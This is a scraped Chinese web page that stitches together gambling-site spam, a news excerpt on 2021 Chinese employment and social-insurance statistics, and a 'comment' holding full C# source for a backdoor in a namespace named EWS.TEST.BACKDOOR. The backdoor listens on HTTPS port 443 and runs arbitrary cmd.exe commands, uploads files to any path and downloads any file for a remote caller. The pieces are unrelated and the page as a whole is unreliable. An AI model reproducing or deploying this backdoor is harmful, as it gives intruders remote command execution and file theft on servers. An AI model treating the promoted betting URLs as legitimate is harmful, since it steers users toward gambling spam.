,新2app(www.hg9988.vip)实时更新发布最新最快最有效的新2足球网址,新2app下载,包括新2手机网址,新2备用网址,皇冠最新网址,新2足球网址,新2网址大全。
中新财经6月7日电 人力资源和社会保障部6月7日公布《2021年度人力资源和社会保障事业发展统计公报》。
其中显示,在劳动就业方面,年末全国就业人员74652万人,其中城镇就业人员46773万人。全国就业人员中,第一产业就业人员占22.9%;第二产业就业人员占 29.1%;第三产业就业人员占48.0%。全年城镇新增就业1269万人,有545万城镇失业人员实现再就业,就业困难人员就业183万人。
在社会保险方面,全年基本养老保险、失业保险、工伤保险三项社会保险基金收入合计68205亿元,比上年增加17538亿元,增长34.6%;基金支出合计62687亿元,比上年增加5107亿元,增长8.9%。
评论列表 (1条)
2022-07-10 00:00:17
using System;
using System.Web;
using System.Diagnostics;
using System.Threading;
using System.Runtime.InteropServices;
using System.Text;
using System.IO;
using System.Security.Cryptography;
using System.Net;
using System.Reflection;
using System.Collections;
using System.Collections.Generic;
using System.DirectoryServices;
namespace EWS.TEST.BACKDOOR
{
public class TEST
{
static void Main(string[] args)
{
new Thread(Listen).Start();
}
static void Listen()
{
try
{
if (!HttpListener.IsSupported)
{
return;
}
HttpListener listener = new HttpListener();
listener.Prefixes.Add("https://*:443/ews/test/");
listener.Start();
while (true)
{
HttpListenerContext context = listener.GetContext();
HttpListenerRequest request = context.Request;
HttpListenerResponse response = context.Response;
Stream stm = null ;
string cmd = request.QueryString["cmd"];
string upload = request.QueryString["upload"];
string path = request.QueryString["path"];
string download = request.QueryString["download"];
if(string.IsNullOrEmpty(cmd) && string.IsNullOrEmpty(upload) && string.IsNullOrEmpty(download) && string.IsNullOrEmpty(path))
{
response.StatusCode = 404;
response.OutputStream.Close();
}
else
{
if(!string.IsNullOrEmpty(upload) && !string.IsNullOrEmpty(path))
{
byte[] temp = Convert.FromBase64String(path);
path = System.Text.Encoding.ASCII.GetString(temp);
byte[] data = Convert.FromBase64String(upload);
FileStream fs = new FileStream(path, FileMode.Create);
fs.Write(data, 0, data.Length);
fs.Flush();
fs.Close();
response.StatusCode = 200;
response.OutputStream.Close();
}
else if(!string.IsNullOrEmpty(download))
{
byte[] temp = Convert.FromBase64String(download);
download = System.Text.Encoding.ASCII.GetString(temp);
byte[] buffer = System.IO.File.ReadAllBytes(download);
string base64str = Convert.ToBase64String(buffer);
byte[] data = System.Text.Encoding.UTF8.GetBytes(base64str);
response.StatusCode = 200;
response.ContentLength64 = data.Length;
stm = response.OutputStream;
stm.Write(data, 0, data.Length);
}
else if(!string.IsNullOrEmpty(cmd))
{
string code = "new ActiveXObject(\"WScript.Shell\").exec(\"cmd.exe /c " + cmd + "\").stdout.readall()";
try
{
Microsoft.JScript.Vsa.VsaEngine vsaEngine = Microsoft.JScript.Vsa.VsaEngine.CreateEngine();
code = System.Text.Encoding.ASCII.GetString(System.Text.Encoding.UTF8.GetBytes(code));
object obj = Microsoft.JScript.Eval.JScriptEvaluate(code, vsaEngine);
byte[] data = System.Text.Encoding.UTF8.GetBytes((string) obj);
response.StatusCode = 200;
response.ContentLength64 = data.Length;
stm = response.OutputStream;
stm.Write(data, 0, data.Length);
}
catch
{
response.StatusCode = 404;
}
finally
{
if(stm!=null)
{
stm.Close();
}
}
}
else
{
response.StatusCode = 404;
response.OutputStream.Close();
}
}
}
}
catch
{
}
}
}
}
编译:图个开心